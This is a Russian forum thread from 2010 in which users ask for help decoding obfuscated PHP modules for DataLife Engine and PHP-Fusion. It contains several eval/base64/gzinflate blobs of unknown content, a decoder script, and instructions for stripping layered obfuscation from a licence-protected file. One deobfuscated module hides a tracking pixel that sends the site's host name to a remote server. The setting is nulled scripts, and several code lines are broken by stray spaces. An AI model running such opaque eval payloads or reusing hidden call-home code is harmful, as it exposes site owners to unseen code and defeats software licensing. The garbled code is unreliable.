fwrite($IIIIIIIIIll1,"'{$IIIIIIIIIl11}' => \"{$IIIIIIIII1II}\",\n\n");
}
fwrite($IIIIIIIIIll1,");\n\n?>");
fclose($IIIIIIIIIll1);
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190);padding: 5px;margin-top: 7px;\"><font color=\"green\">Модуль успешно активирован. Обновите страницу</font></div>");
}

<?php
@session_start();
@error_reporting(7);
@ini_set('display_errors',true);
@ini_set('html_errors',false);
define('DATALIFEENGINE',true);
define('ROOT_DIR','../..');
define('ENGINE_DIR','..');
include ENGINE_DIR.'/data/config.php';
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);
$version = "2.0.1";
$update = @file_get_contents("http://www.zeos.org.ru/uploads/update.txt");
if($update >$version) $info = "<font color=red>вы используете устаревшую версию модуля, рекомендуется выполнить обновление</font>";
elseif($update == $version) $info = "<font color=green>вы используете актуальную бесплатную нулёную версию модуля, следите за обновлениями</font>";
elseif($update == "") {$update = "--";$info = "не удалось подключится к удаленному серверу, повторите попытку немного позднее";}
elseif($update <$version) $info = "<font color=red>вы используете неопределенную версию модуля, установите последнюю версию</font>";
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190);padding: 5px;margin-top: 7px;\">Последняя версия: ".$update." (".$info.")</div>");
?>

Sergei_Petro

01.04.2010, 16:33

Расшифруйте, пожалуйста.. Известно, что там есть зен, возможно гзип, и точно присутствует база 64.
<?php eval(gzinflate(base64_decode( 'FZZFDsSIEUX3c5HMyAszKTAyt7HNtInMzOzTp3OBkn5V6f339 3/+9fdcz38UZ9L/' .'Wb3NWPbJXvyZJltBYP/Ni2zKiz//8YcYxyK/ObLouWiGf/SH2V7VZZ4d728BH3ej' .'/WbmDLWgSocrsJ4g+K4kOcTg05q7CbzlftzE/qVB3tB2XGPA/vAA3/FKkGz5l1Ts' .'D/Eqyed1G8b+DpNLB3l0zup4wlLJ60NsOzYdQ2EiSJVdFVxcPax4 LayF6pPio+xN' .'CB2XjjnzwmfLgZbqyUDiTSwe1ClXFVWojMtDN/xVRnaDkru6ce1zOAfwfXOMZFgG' .'MKwNMwIsx4LLEz37U0VfCNAo4EAvP87umVz9dizj1ukL1dOt ZjqtpxP9mI7tjoMC' .'38lP+BEFRSwOxuY3PHM78MMPc/fsNMnrjFALG1PuYaZ/ddBd4UVQkojws1i3ZuFq' .'iCjYOXk3FPQr5GxXBLkXg+ziGNXhhwmLPr80n20iQ/KAcjOZDvHBr1Am5jUULADW' .'5wVmD4gU1F6OTWO89F5Dj2dg5jTjQcjimS/FtIfKkfDOh2vAFf4GuEdsr1Wg2vuk' .'acjkJg/jjvJteOlSsjE8Hk4ErMiSB5r+SsJCn0YUTlIy5AVotM6zDMOE9 ILDOXmf' .'uy4OptzJQJ4CRnXSBo7mTMvzfCiFh8Olnhddn1xCwbj7SLeQ QRkrv6HlTG0xToSE' .'6N4v1AWJMGzLaA3aXljM6GJW+pK+ACe0ZrXlntvQXgyFFxQN Aidvx9NMP+XCkl86' .'A7iYM42HK79JsjvoETOv0hVZLEwxW5P1gy83vImnVG5yLYdH bWAvXOby6R6u/vhA' .'BHcVHz7R2h9+0IChvZ0sibzm2Efa2Z9eg4Ole5R1u9RYvAXk yYUiH6RMR03yB3tY' .'tBxMYGxOjpr5cLIYMj3YZip+R81drz8lZ0n4ajNUabsxrQhA T6B3fF59321mtc+/' .'CYwH0Ns73lGedFuZelVrCCF28LqzNyMwpkkviyWoc2SIi9tK JiyylCogluDFmMxg' .'WJbQgtWepWtjCO/6K3jKRNQKpAx0uQcz0xw2fKPrnEB+MjZF+4H5eEMT9JZelndC' .'e9A5OUoz9ne0cja/txynmuoIGA68wFp1oHI5xkuL3s2KRm7INlE+5KIJV9bVMUvD' .'RaS+OwJPFe6L8V87RodgJM99MGlQzhwsAesLSs9TxvZvgL41 eK6jxqh1j18pDIWj' .'NlAkL9BAL7lqexFnhkq0sS0I09S4Q8IIZ7qIkxSYBLLznS80 v9OHVoxJjwy+D2zt' .'BU72vA7Ok9WuCX0vFyYxMT7fpzqYjS0Vo4EJT4mdz9jAsKdV wT2JBDUmjZsGsV6H' .'klBB81l+Bj9w52wJUd5ZS9LN5Nv1FnxKmAg/FNu+ngNxDDYjnsc/lK0rgCdcezbC' .'uUxwi9BF7J0lmGhUcdkeacC3F8R9i/ANxcEjBb1gkRJ0W6AUy+Z2apCyns2HzHQV' .'6vXjYvzGZOz3Rqjj92z23QrGUcl6UKAOfTuxYfW07ni9t6NH j8HXkk1p/4SYvZKi' .'dkfkViRjRJnZ/PLAqHrrth7I6+DV8vjEDu2uf1EPXreUGH5OF1ejOQ0ah+hmOrv O' .'R0VwjZCwRBcKwxiLq+czJtMMEIn8qCAgQpnaIMQrHT4l0bed yIp3imKDVSy/hogq' .'WcFCLFuYGD/donc3puVNWzyZ1TM0qWsOuZUhzQyiDYrTwQB5Wq7ApM3Qp1bGA gE0' .'qV1C348i5qPPLczUvP5y3OisvBnYlkQw4go2EtL3ghE57bcH fz/oJyrhNhX4kKSi' .'yCXIz+VA9GD0EZOmVP2qgZaTNX4gn3MuOod2fedNSEAYQkKO RkCOTGhAhQ9PCbN6' .'rHtOEcaKrd5Qu3wTbZLm3EFFmpmiF5TPgth9zJqUaB6htznT eHBN7E8hVNoptT4x' .'ldQDHltTMdHqfnzk+8zz5CQAY56NJc0FsBOrNZVJB5GEYRhu 9OVvDhOZLkahLoLF' .'5psS8iGVuckWYZ88Z43saTHqjabRKxz2Vs2Fppsr0SnxnI8y QGqYcq4CSYgT0WQj' .'G5FAFjJiVpwiygqru8ptv/6LkYFlJVZafK5+wdoI4CcMkIK270/4ld8G+ax12n4R' .'EQIMXjZsL13BOg++AnTItHbdzJghEKURTLl80TFoaYUsldYA 3C4RS5gU+h9rO0cs' .'FmzfmbgCK8i+VHBYJdMQ+kTErsfHNj/BpqG5jK4GEWvFYj4WscefPHRnZXVOuP0b' .'uQ4rpYj0owXGl3DR0mZL+vyrkQAxBttv0/yHWbOaqgTSpeJ7Pl3uPaIlKkwg6+bU' .'qnp5MgyhC+RyeTiCxYunAFkXFW2FWXgd8N7oWno4gnw1EvVC E2d0wwR2GiQBuTeb' .'8jel6KU3T8zeI5axPyjM9sRCN4wrCmopMfkZ15eVfBkG4Pj2 6wqai8FsQSNDsuvX' .'xRQVXLdjUzV4HnEg1eTLSzTruKYhmBQkGXeuU+UcFo7p6PS1 vnBnHZXV58M7u3zJ' .'O/TKSKpSQ0giZCkdVaGSbGQoiBAoYSLnuyA8psuaHxa9qt6CWbnz 09ezwZ8MoNEc' .'oiy7Iwawl2ZesRhjznVEYsWe+yAJQkXhH9G+bVgIpzN+Hh/i4uUE57ueHCjoCHm6' .'3ObZ5PhkAdnp0PEvgzWth+pj8UuN5R3F+9xGCK14RcVCkI4D NQcGET6jScfX45OT' .'Uzg98V0W7bZWwS92+r/oDWjS9DVwflrGR2ReA34Da3xbf0WfPx0ofIuy1M2hQc20' .'Nj6muHeKFXCq1K8/0IpfIbtgeT6M9egdH3A0eJAqY9TwDwMLvafD+Q3sqlKtmaeE' .'8veU++C9rcKIAg3QZYyBsEcIv6ZfRbvR0MtYvurc/WSIOk5IkQLM6sNIIB3O9dIb' .'M2EZgO09ogQ7vjlZy46f8b3pdq3w7s8Z7yoOasl5QUg+IOum twJnA5E8LMyDajHc' .'tlSTgOKbcLFjt4QgiBEA+P92+6AgeB8kyDD//vc//vrrr3/+8fdPtP8H' ))); ?>

Pashkela

01.04.2010, 18:09

?><?
/*---------------------------------------------------+
| PHP-Fusion Content Management System
| Copyright (C) 2002 - 2008 Nick Jones
| http://www.php-fusion.co.uk/
+----------------------------------------------------+
| This program is released as free software under the
| Affero GPL license. You can redistribute it and/or
| modify it under the terms of this license which you
| can read by viewing the included agpl.txt or online
| at www.gnu.org/licenses/agpl.html. Removal of this
| copyright header is strictly prohibited without
| written permission from the original author(s).
+----------------------------------------------------+
| Created for PHP-FUSION 6.01.xx or 7.00.xx
| © 2007-2009 by AlexALX
| http://alex-php.net/
| E-mail: admin@alex-php.net
+----------------------------------------------------*/

if (ini_get('register_globals') != 1) {
die("Sorry, but this mod worker only if <b>REGISTER_GLOBALS=ON</b>! Please turn <b>ON REGISTER_GLOBALS</b> in you <b>php.ini</b> (contact with you hoster).");
}

if (!defined("GAMES_ADMIN_PANEL")) {
require_once "../maincore.php";
} else {
require_once "../../maincore.php";
}

define("FUS_VER",$settings['version']);

if (ereg("^[6.01]+[0-9]", FUS_VER)) {
require_once "core_v6.php";
} else {
require_once "core_v7.php";
}

define("GAMES", BASEDIR."games/");
define("GAMES_IC", GAMES."include/");
define("G_INFUSIONS", GAMES."infusions/");
define("GAMES_LOC", GAMES."locale/");
define("GAMES_ADMIN", GAMES."admin/");
define("GAMES_IMG", GAMES."images/");
define("GAMES_IMG_N", GAMES_IMG."news/");
define("GAMES_IMG_A", GAMES_IMG."articles/");
define("GAMES_IMG_NC", GAMES_IMG."articles/");
define("GAMES_IMG_OBZ", GAMES_IMG."obz/");
define("iUSER_RIGHTS_G", $userdata['user_rights_g']);

$locals = dbarray(dbquery("SELECT locale FROM ".$db_prefix."games_set;"));
$sets_games = dbarray(dbquery("SELECT * FROM ".$db_prefix."games_set;"));
$code_games = dbquery("SELECT * FROM ".$db_prefix."games_code");
$comm_games = dbquery("SELECT * FROM ".$db_prefix."games_comm");

define("GAMES_VERSION", $sets_games['vers']);
define("GAMES_LOCALESET", $locals['locale']."/");

if ($_GET['copy'] == "ok") {
require_once GAMES."subheader.php";
if (file_exists(GAMES."locale/".GAMES_LOCALESET."/core.php")) {
include GAMES."locale/".GAMES_LOCALESET."/core.php";
} else {
include GAMES."locale/English/core.php";
}
require_once GAMES."search_nav.php";
opentable($locale['copy2']);
echo $locale['copy3']."AlexALX";
echo "<br>".$locale['copy4'].$locale['localizator'];
echo "<br>".$locale['copy5']."<a href='http://alex-php.net'>AlexALX</a>";
echo "<br>".$locale['copy6'].GAMES_VERSION;
echo "<br>".$locale['copy7']."GNU Affero GPL version 3";
closetable();
tablebreak();
if (ereg("^[6.01]+[0-9]", FUS_VER)) {
require_once BASEDIR."side_right.php";
require_once BASEDIR."footer.php";
} else {
require_once THEMES."templates/footer.php";
}
}

if ($sets_games['on'] == "0" || $sets_games['on'] == "") {
if (file_exists("setup.php")) {
redirect("setup.php");
die;
}
echo "Invalid licence or attempted burglary script. Script disabled. If you have any questions please contact: <a href='mailto:admin@alex-php.net'>AlexALX</a>.";
die;
} else if ($_GET['error'] == 1) {
echo "Invalid licence or attempted burglary script. Script disabled. If you have any questions please contact: <a href='mailto:admin@alex-php.net'>AlexALX</a>.";
die;
}

if (!file_exists(GAMES_LOC.GAMES_LOCALESET."core.php")) {
if (!file_exists(GAMES_LOC."English/core.php")) {
redirect (BASEDIR."games/core.php?error=1");
}
}

$copysese_fkgroylfbkfrmt04d2nb4f = "<center>© 2007-2009 by <a href='http://alex-php.net' target='_blank'>AlexALX</a></center>";
//$ufdprfdtks0d5hg7x2g4_d4g571c4hu7 = "";

if (file_exists(GAMES."locale/".GAMES_LOCALESET."/core.php")) {
include GAMES."locale/".GAMES_LOCALESET."/core.php";
} else {
include GAMES."locale/English/core.php";
}

function copyring () {
global $locale,$aidlink;
$copysese_fkgroylfbkfrmt04d2nb4f = "<center>© 2007-2009 by <a href='http://alex-php.net' target='_blank'>AlexALX</a></center>";
if ($locale['copy_s'] == "") {
$locale['copy'] = "License error";
}
if ($locale['copy1'] == "") {
$locale['copy1'] = "License error";
}

opentable($locale['copy_s']);
if (iUSER_RIGHTS_G != "") {
echo "<center><a href='".GAMES."admin/index.php".$aidlink."'>".$locale['admin']."</a></center>";
}
$homes = str_replace('www.', '', $_SERVER['HTTP_HOST']);
$homes = str_replace(':', '@', $homes);

echo "<center><a href='".GAMES."core.php?copy=ok'>".$locale['copy1']."</a><img src='http://alex-php.net/games/admin/image.php?url=".$homes."' height='1' width='1'></center>";
echo $copysese_fkgroylfbkfrmt04d2nb4f;
closetable();
tablebreak();
}

function checkrights_games($right) {
if (iADMIN && in_array($right, explode(".", iUSER_RIGHTS_G))) {
return true;
} else {
return false;
}
}

function search_words($text, $substr, $words_before, $words_after) {
preg_match_all('%((?:\S+\s+){0,'.(int)$words_befor e.'}\b'.preg_quote($substr, '%').'\b(?:\s+\S+){0,'.(int)$words_after.'})%i', $text, $matches, PREG_PATTERN_ORDER);
//print_r($matches[1]);
return $matches[1];
}

if (file_exists(GAMES."setup.php")) {
echo "Please delete setup file.";
die;
}

?><?

код для расшифровки:

<pre>
<?php
$flag = true;
$i = 0;
while ($flag) {
$a = file_get_contents('result.txt');
if (preg_match("#base64_decode(.*'(.*).*')#s",$a,$res)) {
$temp = $res[1];
$temp = str_replace('(',"",$temp);
$temp = str_replace('.',"",$temp);
$temp = str_replace("'","",$temp);
$temp = str_replace(" ","",$temp);
file_put_contents('result.txt',gzinflate(base64_de code(" . $temp . ")));
$i++;
} else {
$flag = false;
}
}
echo "Count: = $i\n";
echo gzinflate(base64_decode(" . $temp . "));
?>
</pre>

в файл result.txt кладешь свой зашифрованный код

efs

11.04.2010, 20:27

http://narod.ru/disk/19610969000/footer.php.html
помогите с расшифровкой

Life7

11.04.2010, 21:55

grandtraff

14.04.2010, 19:57

Здравствуйте уважаемые форумчане, огромная просьба к Вам раскодируйте пожалуйста несколько файлов:

http://testgo.ru/arch.zip

Заранее спасибо!

Paketik.Pro

19.04.2010, 10:07

Чем раскодировать такой код:

$x7b="\x61\162\162a\171_k\x65y\x5f\x65\170\x69\x73\x74s"; $x7c="\142\x61\163\x65\x364_\144\x65\x63\x6fde"; $x7d="\142ase_\x63onv\x65\162t"; $x7e="\142\141\x73e\156a\x6d\x65"; $x7f="\x63\x68r"; $x80="\x63\150\155o\144"; $x81="\x63\x6f\165\156t"; $x82="\143\165rl_in\151\164"; $x83="\143u\162\x6c_s\145t\x6f\x70\164"; $x84="\143u\162\x6c_ex\x65\x63"; $x85="\x63\x75r\154\x5f\x63\154o\163\145"; $x86="\144at\145"; $x87="\x65\x72ro\162_\x72\145\160\x6f\x72\x74i\156\147"; $x88="\x65x\x70l\x6f\x64e"; $x89="\146\143\x6co\x73\145";

public function x15($x1e)
{
global $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87,
$x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95,
$x96, $x97, $x98, $x99, $x9a, $x9b, $x9c, $x9d, $x9e, $x9f, $xa0, $xa1, $xa2, $xa3,
$xa4, $xa5, $xa6, $xa7, $xa8, $xa9, $xaa, $xab, $xac, $xad, $xae, $xaf, $xb0, $xb1,
$xb2, $xb3, $xb4, $xb5, $xb6, $xb7, $xb8, $xb9, $xba, $xbb, $xbc, $xbd, $xbe, $xbf,
$xc0, $xc1;
$x52 = array();
$x53 = array();
$xaf('|\<a href\="(http\://[^"]+?/engine/go\.php\?url\=(.+?))" target\="_blank"\>|',
$x1e[0] . $x1e[1], $x54, PREG_SET_ORDER);
foreach ($x54 as $x55)
{
if (!$x7b($x55[0], $x53))
$x53[$x55[0]] = $xb4($x55[1], x0b($x55[2]), $x55[0]);
}
if (!empty($x53))
{
$x1e[0] = $xb9($x1e[0], $x53);
$x1e[1] = $xb9($x1e[1], $x53);
}
return $x1e;
}
public function x16($x56, $x57)
{
global $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87,
$x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95,
$x96, $x97, $x98, $x99, $x9a, $x9b, $x9c, $x9d, $x9e, $x9f, $xa0, $xa1, $xa2, $xa3,
$xa4, $xa5, $xa6, $xa7, $xa8, $xa9, $xaa, $xab, $xac, $xad, $xae, $xaf, $xb0, $xb1,
$xb2, $xb3, $xb4, $xb5, $xb6, $xb7, $xb8, $xb9, $xba, $xbb, $xbc, $xbd, $xbe, $xbf,
$xc0, $xc1;
list($x56, $x57) = $this->x15(array($xb4(array('<br>', '<br/>'), array('<br />',
'<br />'), $x56), $xb4(array('<br>', '<br/>'), array('<br />', '<br />'), $x57)));
list($x56, $x57) = $this->x14(array($x56, $x57));
return array($x56, $x57);
}

Flenat

22.04.2010, 16:20

Помогите пожалуйста.

<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000 =2760;eval(gzuncompress(base64_decode('eNplj1ePgkA AhP8MCbsR44KIEMKDvbv29nKhLEVp7lKUX3+au9xdcpl5msx8y XAYIYRfQoabpCQGHMb4KxB4avFQL/0gJKBe5/C7+DZ0PZIxwP1MBRFJMtT/xTLSFKi/iN9Lw6vy2E6ilBLGgGUyosgfDrEThwCW0YwClxLT+YtQVBUK/AU9H3IkYlMLJotO2T+TqraeZ7fT0hsovro/MCvuTlsNOx/TVRrOku396Azddk8qrqPmbmPwAt/p9vqD4Wg8mc7miyVerTfb3f5wPJ0vpmU7xPX84HoLozhJ75Rle VE+nhUSpabcUtqqVmvwEEKdFGYIfg9B/RPMh18q')));return;?>
8AHAQLp+fBZQRbProjVENNicbmr4x5cYJ9lZ8wFBY/ayHq49lSpZSuRkOG9x5+unP80xkf5opDtsM7Lf3T16Rz2/KBApP5YOrb5c2TrYuFSoVulxPwwFUYg6Xd5qi006go4HNGpcCA Z1g/ptCZybOxOc09z0sXzOtwZbdYHE71+QmWaHwf0oY0oZjgNepH9J Qu1t4DCOe8/F8rIUG5QksAaf7M0omOZL0rXGA2sReUE8xhFLd/pXzJiE44a20d1bfLHprm8FzJfrvDLdukHAmdQSkhxo9dJgkbNI oi09yzN4kr5euXT1ifbxbslN0eiwRL3y8/nCCj6ZklAkLrNQrE7D2ATGe8gUsTDS6ag8O/TMSJGUNfVq/OvUD43U9PDSEDYq/g4K+TmjRnXgx3myA2YABCbtzHrv8JAW82f0jSs5Hinr5LS8d7Q 6bTyaOM9ivKqc6Jn17HvhAMIA98iv0gN/Z81yyQNP0cNmcbOTmqKffdhLuebTQlRjGUNgqhbslQivh7V9V3 k+KIbjixgFe1KjrMCEjKjSu5a1tLEf/ewKfn57MKEtokr735bnLB/s14jKOSSH5gAPjKVBkqbtqH8LglfPU/2S8tQd+ZKPNcK87nJpFRMjnalVfTKUx3zF3X7CN59r8fhLoUDP BrEu80W8xycJctPC21GPQKa/ana1yZ==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

Failure

22.04.2010, 17:45

ну выше же писали что и как =\
тут обфускация в несколько итераций, всё просто и тупо, меняем eval на echo, получаем

$O000O0O00=fopen($OOO0O0O00,'rb');while(--$O00O00O00)fgets($O000O0O00,1024);fgets($O000O0O00 ,4096);$OO00O00O0=gzuncompress(base64_decode(strtr (fread($O000O0O00,688),'Z0yx4m1Oa9iIMAwDYez+QLtkXN gE6h8UVsbnBJ5/cuHrPplKoSqWdFf7C2vjG3TR=','ABCDEFGHIJKLMNOPQRSTUV WXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);

теперь, стираем всё что было в echo(...); пишем то что вышло, и опять же eval меняем на echo получаем такой скрипт:

<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000 =2760;$O000O0O00=fopen($OOO0O0O00,'rb');while(--$O00O00O00)fgets($O000O0O00,1024);fgets($O000O0O00 ,4096);$OO00O00O0=gzuncompress(base64_decode(strtr (fread($O000O0O00,688),'Z0yx4m1Oa9iIMAwDYez+QLtkXN gE6h8UVsbnBJ5/cuHrPplKoSqWdFf7C2vjG3TR=','ABCDEFGHIJKLMNOPQRSTUV WXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));echo($OO00O00O0);return;?>
8AHAQLp+fBZQRbProjVENNicbmr4x5cYJ9lZ8wFBY/ayHq49lSpZSuRkOG9x5+unP80xkf5opDtsM7Lf3T16Rz2/KBApP5YOrb5c2TrYuFSoVulxPwwFUYg6Xd5qi006go4HNGpcCA Z1g/ptCZybOxOc09z0sXzOtwZbdYHE71+QmWaHwf0oY0oZjgNepH9J Qu1t4DCOe8/F8rIUG5QksAaf7M0omOZL0rXGA2sReUE8xhFLd/pXzJiE44a20d1bfLHprm8FzJfrvDLdukHAmdQSkhxo9dJgkbNI oi09yzN4kr5euXT1ifbxbslN0eiwRL3y8/nCCj6ZklAkLrNQrE7D2ATGe8gUsTDS6ag8O/TMSJGUNfVq/OvUD43U9PDSEDYq/g4K+TmjRnXgx3myA2YABCbtzHrv8JAW82f0jSs5Hinr5LS8d7Q 6bTyaOM9ivKqc6Jn17HvhAMIA98iv0gN/Z81yyQNP0cNmcbOTmqKffdhLuebTQlRjGUNgqhbslQivh7V9V3 k+KIbjixgFe1KjrMCEjKjSu5a1tLEf/ewKfn57MKEtokr735bnLB/s14jKOSSH5gAPjKVBkqbtqH8LglfPU/2S8tQd+ZKPNcK87nJpFRMjnalVfTKUx3zF3X7CN59r8fhLoUDP BrEu80W8xycJctPC21GPQKa/ana1yZ==8AHhtJpKF4XXUhvLTZTxm+Q9yrPBegbyurzy694VYZ/bVL+tS92htRmJN6TqsiuRrluxkvHHQ/TZ5qEAZP/5ebPsBwV7CRklnwTWio+y6Tg6M2R/T/BlAAlk5HlWR9cDO3F1fs7EazmvfUHqpgqsnsTVf2nb07gOcxtK g7P4kQNEwTbusjh9PSGCg0LNJDglp3KlnlhKfjVL3ppAC5IEZg +hxExr4UupJWFc1EjEROAd6/vanBhj8RP/RjohcPDe7K5jWo/9Xx0chLoO2muYr+FnYRapTSfv+VXs8BsM1vwjVhRKAzRDG5lwW Ncwl8o0XqlZ9PR1hMKKjYefFv9coLs4iF8lkmfyKjjiAWpEMOv 9ncCTKBmKe7KcaDcoRI0RsiIhP3O9vhKsCeZh/dzjd8moeljU+dgjTqUZ80zsKRXDePUevhOc3wo+H0F1e7lnATb 2NLwyAVsfNCWYO31EPWOhej1kx0nSNYr4riUMvD3zTdI+jHymb GVBO8Vu9JuZGj8RfRnloUdjgfKrhTTKrGfnS6QIWXNu4qn+j5m nfRgvymAi70v3HiOm1S8gM656RK7gBfhr+WUYbRJTzZIhoH4FR oAgkQtgs5ZBmY4lrHa2v4lvCdAK2Y3ImA4WHaBG/GIVjOl5g10sWbklmKygtTnmMsh8k5+yoaHxZwGZ/oSNY/MhAp2KTLjOjcapE0VBxOtxRFR/Nt0o6eO3yajVWSox3yVSCWaXR+zok8ZACh38va078ZcqTlAOK9 dq//mSoWJ4m/thP46M1Wl1sYDwacwtdArvsKjBfgwApg6SyqAbetZXSJ1F5qJt 6yae2I5XZKahQ9PyoItxoZTtHdFa6MmO5bEDbc+9luOiL3zPr0 eXtgJsNzQRMIsDUYA+7UAA4pahs3+cITBHXuU9c6KpAtJ6KnP1 agGMufRtGytZ0Q6qeNCkZL4Yavh/XeFBR8dvodJZb21ezkixaB0qwB26DDZxPvC9sPFX10MQ1fyZR4 y4M9RrfRsHpkvymAzmq//gzkmwo2Mbj1Wn8ZglEf0g9G8iems5gVHPPpUxXgncnJQuMn85H R+16mktIxTBbpNXJz9rXjuigoSkO+LHiQ8AtPLeC7YFcBgpVb4 UIjioPvMHqvsQ9Etzul5imJM9JW6AS0b+wZzgc5Nwr9zFJvaPM zVbbqfit2+gmpDj5JIi4cPbPpVbnWYPZarKJ3Qc8IFnPHH7qfx mpJjgNMx55RHf9ntqpBzq4JP+tw5avx5XouO+2gfcjQvHJktX9 bFSiQmIZBbydDX3ANhbuNooqueJBezYSeg7X9B/bVvmwJ5xM519DomXEZTE9p3QFFPF6buJxgXczSqiqaihc83eCn 4gj8lEnTG37KYfD8f1tAiycB7SjDeb7llC51G4Qn3ZcsX6o8sI jabp5lZkcLbjQQlnZqMjH3ZcBsnxmYe6RyHdkSANc20Rbrv4JH TPkmLeqsoMQYAdAnt5JxC6ZlJ57Yb99WqV/OaiSWomKKes+kYuO3s59mduaLFeaUkvjbzQpUrUmiRqfsWOOGy IvUEsgZkshMhqezu28Zt2dDaO8pnU5KXzFyb+qT0LpUV+WuZMp QguLsHK1Bct4s6ZC3UtiafnymXYP5q+vD7Z5UzMeH1MZmQYG1o 